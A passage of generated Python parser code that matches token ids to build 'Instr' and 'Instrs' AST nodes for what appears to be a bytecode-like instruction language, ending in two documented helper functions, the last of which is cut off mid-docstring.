lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 23):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'INT not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 26):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'INT not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 20):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 14):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = (_slot_0,)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_1 = lcl_3
elif (lcl_2 == 19):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 18):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 17):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 9):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 8):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 42
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'PY not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 16):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'INT not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 6):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 5):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 27):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = prim__tokens.offset
_off_1 = lcl_3
lcl_3 = (len(prim__tokens.array) > (prim__tokens.offset + 0))
if lcl_3:
lcl_5 = prim__tokens.array[(prim__tokens.offset + 0)]
lcl_5 = lcl_5.idint
if (lcl_5 == 28):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_6 = _py_local_t
_slot_1 = lcl_6
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_2_check = lcl_6
lcl_6 = _slot_2_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_2_check
else:
lcl_7 = _slot_2_check[1]
lcl_7 = lcl_7
_slot_2 = lcl_7
lcl_7 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_3 = lcl_7
lcl_7 = (_slot_3 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'quote } not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3)
lcl_8 = prim__mk__ast('Instr', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 37):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_1_check = lcl_6
lcl_6 = _slot_1_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_1_check
else:
lcl_7 = _slot_1_check[1]
lcl_7 = lcl_7
_slot_1 = lcl_7
lcl_7 = 28
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_2 = lcl_7
lcl_7 = (_slot_2 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'quote { not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_8
lcl_8 = _slot_3_check[0]
lcl_8 = (lcl_8 is False)
if lcl_8:
lcl_8 = _slot_3_check
else:
lcl_9 = _slot_3_check[1]
lcl_9 = lcl_9
_slot_3 = lcl_9
lcl_9 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_9):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_9 = _py_local_tk
_slot_4 = lcl_9
lcl_9 = (_slot_4 is None)
if lcl_9:
lcl_10 = prim__tokens.offset
lcl_10 = (lcl_10, 'quote } not match')
lcl_10 = prim__cons(lcl_10, prim__nil)
lcl_10 = lcl_10
lcl_10 = (False, lcl_10)
lcl_9 = lcl_10
else:
lcl_10 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_10 = prim__mk__ast('Instr', lcl_10)
_slot_local__1 = lcl_10
lcl_10 = (True, _slot_local__1)
lcl_9 = lcl_10
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 36):
lcl_10 = parse_Attrs(prim__state, prim__tokens)
_slot_1_check = lcl_10
lcl_10 = _slot_1_check[0]
lcl_10 = (lcl_10 is False)
if lcl_10:
lcl_10 = _slot_1_check
else:
lcl_6 = _slot_1_check[1]
lcl_6 = lcl_6
_slot_1 = lcl_6
lcl_6 = 28
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_6):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_6 = _py_local_tk
_slot_2 = lcl_6
lcl_6 = (_slot_2 is None)
if lcl_6:
lcl_7 = prim__tokens.offset
lcl_7 = (lcl_7, 'quote { not match')
lcl_7 = prim__cons(lcl_7, prim__nil)
lcl_7 = lcl_7
lcl_7 = (False, lcl_7)
lcl_6 = lcl_7
else:
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_7
lcl_7 = _slot_3_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_3_check
else:
lcl_8 = _slot_3_check[1]
lcl_8 = lcl_8
_slot_3 = lcl_8
lcl_8 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_4 = lcl_8
lcl_8 = (_slot_4 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'quote } not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_9 = prim__mk__ast('Instr', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_10 = lcl_6
lcl_4 = lcl_10
elif (lcl_5 == 39):
lcl_10 = parse_Attrs(prim__state, prim__tokens)
_slot_1_check = lcl_10
lcl_10 = _slot_1_check[0]
lcl_10 = (lcl_10 is False)
if lcl_10:
lcl_10 = _slot_1_check
else:
lcl_6 = _slot_1_check[1]
lcl_6 = lcl_6
_slot_1 = lcl_6
lcl_6 = 28
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_6):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_6 = _py_local_tk
_slot_2 = lcl_6
lcl_6 = (_slot_2 is None)
if lcl_6:
lcl_7 = prim__tokens.offset
lcl_7 = (lcl_7, 'quote { not match')
lcl_7 = prim__cons(lcl_7, prim__nil)
lcl_7 = lcl_7
lcl_7 = (False, lcl_7)
lcl_6 = lcl_7
else:
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_7
lcl_7 = _slot_3_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_3_check
else:
lcl_8 = _slot_3_check[1]
lcl_8 = lcl_8
_slot_3 = lcl_8
lcl_8 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_4 = lcl_8
lcl_8 = (_slot_4 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'quote } not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_9 = prim__mk__ast('Instr', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_10 = lcl_6
lcl_4 = lcl_10
elif (lcl_5 == 35):
lcl_10 = parse_Attrs(prim__state, prim__tokens)
_slot_1_check = lcl_10
lcl_10 = _slot_1_check[0]
lcl_10 = (lcl_10 is False)
if lcl_10:
lcl_10 = _slot_1_check
else:
lcl_6 = _slot_1_check[1]
lcl_6 = lcl_6
_slot_1 = lcl_6
lcl_6 = 28
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_6):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_6 = _py_local_tk
_slot_2 = lcl_6
lcl_6 = (_slot_2 is None)
if lcl_6:
lcl_7 = prim__tokens.offset
lcl_7 = (lcl_7, 'quote { not match')
lcl_7 = prim__cons(lcl_7, prim__nil)
lcl_7 = lcl_7
lcl_7 = (False, lcl_7)
lcl_6 = lcl_7
else:
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_7
lcl_7 = _slot_3_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_3_check
else:
lcl_8 = _slot_3_check[1]
lcl_8 = lcl_8
_slot_3 = lcl_8
lcl_8 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_4 = lcl_8
lcl_8 = (_slot_4 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'quote } not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_9 = prim__mk__ast('Instr', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_10 = lcl_6
lcl_4 = lcl_10
elif (lcl_5 == 34):
lcl_10 = parse_Attrs(prim__state, prim__tokens)
_slot_1_check = lcl_10
lcl_10 = _slot_1_check[0]
lcl_10 = (lcl_10 is False)
if lcl_10:
lcl_10 = _slot_1_check
else:
lcl_6 = _slot_1_check[1]
lcl_6 = lcl_6
_slot_1 = lcl_6
lcl_6 = 28
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_6):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_6 = _py_local_tk
_slot_2 = lcl_6
lcl_6 = (_slot_2 is None)
if lcl_6:
lcl_7 = prim__tokens.offset
lcl_7 = (lcl_7, 'quote { not match')
lcl_7 = prim__cons(lcl_7, prim__nil)
lcl_7 = lcl_7
lcl_7 = (False, lcl_7)
lcl_6 = lcl_7
else:
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_7
lcl_7 = _slot_3_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_3_check
else:
lcl_8 = _slot_3_check[1]
lcl_8 = lcl_8
_slot_3 = lcl_8
lcl_8 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_4 = lcl_8
lcl_8 = (_slot_4 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'quote } not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_9 = prim__mk__ast('Instr', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_10 = lcl_6
lcl_4 = lcl_10
elif (lcl_5 == 38):
lcl_10 = parse_Attrs(prim__state, prim__tokens)
_slot_1_check = lcl_10
lcl_10 = _slot_1_check[0]
lcl_10 = (lcl_10 is False)
if lcl_10:
lcl_10 = _slot_1_check
else:
lcl_6 = _slot_1_check[1]
lcl_6 = lcl_6
_slot_1 = lcl_6
lcl_6 = 28
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_6):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_6 = _py_local_tk
_slot_2 = lcl_6
lcl_6 = (_slot_2 is None)
if lcl_6:
lcl_7 = prim__tokens.offset
lcl_7 = (lcl_7, 'quote { not match')
lcl_7 = prim__cons(lcl_7, prim__nil)
lcl_7 = lcl_7
lcl_7 = (False, lcl_7)
lcl_6 = lcl_7
else:
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_7
lcl_7 = _slot_3_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_3_check
else:
lcl_8 = _slot_3_check[1]
lcl_8 = lcl_8
_slot_3 = lcl_8
lcl_8 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_4 = lcl_8
lcl_8 = (_slot_4 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'quote } not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_9 = prim__mk__ast('Instr', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_10 = lcl_6
lcl_4 = lcl_10
else:
lcl_10 = (_off_1, 'Instr lookahead failed')
lcl_10 = prim__cons(lcl_10, prim__nil)
lcl_10 = lcl_10
lcl_10 = (False, lcl_10)
lcl_4 = lcl_10
lcl_3 = lcl_4
else:
lcl_10 = (_off_1, 'Instr got EOF')
lcl_10 = prim__cons(lcl_10, prim__nil)
lcl_10 = lcl_10
lcl_10 = (False, lcl_10)
lcl_3 = lcl_10
lcl_1 = lcl_3
elif (lcl_2 == 7):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_10 = _py_local_t
_slot_0 = lcl_10
lcl_10 = 42
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_10):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_10 = _py_local_tk
_slot_1 = lcl_10
lcl_10 = (_slot_1 is None)
if lcl_10:
lcl_3 = prim__tokens.offset
lcl_3 = (lcl_3, 'PY not match')
lcl_3 = prim__cons(lcl_3, prim__nil)
lcl_3 = lcl_3
lcl_3 = (False, lcl_3)
lcl_10 = lcl_3
else:
lcl_3 = (_slot_0, _slot_1)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_10 = lcl_3
lcl_1 = lcl_10
elif (lcl_2 == 22):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_10 = _py_local_t
_slot_0 = lcl_10
lcl_10 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_10):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_10 = _py_local_tk
_slot_1 = lcl_10
lcl_10 = (_slot_1 is None)
if lcl_10:
lcl_3 = prim__tokens.offset
lcl_3 = (lcl_3, 'INT not match')
lcl_3 = prim__cons(lcl_3, prim__nil)
lcl_3 = lcl_3
lcl_3 = (False, lcl_3)
lcl_10 = lcl_3
else:
lcl_3 = (_slot_0, _slot_1)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_10 = lcl_3
lcl_1 = lcl_10
elif (lcl_2 == 21):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_10 = _py_local_t
_slot_0 = lcl_10
lcl_10 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_10):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_10 = _py_local_tk
_slot_1 = lcl_10
lcl_10 = (_slot_1 is None)
if lcl_10:
lcl_3 = prim__tokens.offset
lcl_3 = (lcl_3, 'ID not match')
lcl_3 = prim__cons(lcl_3, prim__nil)
lcl_3 = lcl_3
lcl_3 = (False, lcl_3)
lcl_10 = lcl_3
else:
lcl_3 = (_slot_0, _slot_1)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_10 = lcl_3
lcl_1 = lcl_10
else:
lcl_10 = (_off_0, 'Instr lookahead failed')
lcl_10 = prim__cons(lcl_10, prim__nil)
lcl_10 = lcl_10
lcl_10 = (False, lcl_10)
lcl_1 = lcl_10
lcl_0 = lcl_1
else:
lcl_1 = (_off_0, 'Instr got EOF')
lcl_1 = prim__cons(lcl_1, prim__nil)
lcl_1 = lcl_1
lcl_1 = (False, lcl_1)
lcl_0 = lcl_1
return lcl_0
def parse_Instrs(prim__state, prim__tokens):
    """Parse an Instrs node: one Instr, then left-recursion continuation.

    Returns the generated-parser result convention: ``(True, ast)`` on
    success or ``(False, error_list)`` on failure.  A failure from
    parse_Instr is propagated untouched; on success the single Instr is
    wrapped in an 'Instrs' AST node and handed to lr_loop_Instrs, which
    absorbs any further repetitions.
    """
    first = parse_Instr(prim__state, prim__tokens)
    if first[0] is False:
        # Propagate the (False, error-list) tuple unchanged.
        return first
    seed = prim__mk__ast('Instrs', (first[1],))
    return lr_loop_Instrs(seed, prim__state, prim__tokens)
def parse_JumpCase(prim__state, prim__tokens):
    """Parse a JumpCase production.

    Grammar as generated: a head token whose id is 33 or 43, followed by
    the '=>' quote (token id 32) and an ID (token id 44).  Returns
    ``(True, ast)`` on success or ``(False, error_list)`` on failure,
    matching the generated-parser calling convention.  The two admissible
    lookahead ids had byte-identical bodies in the generated original, so
    a single merged path is used here.
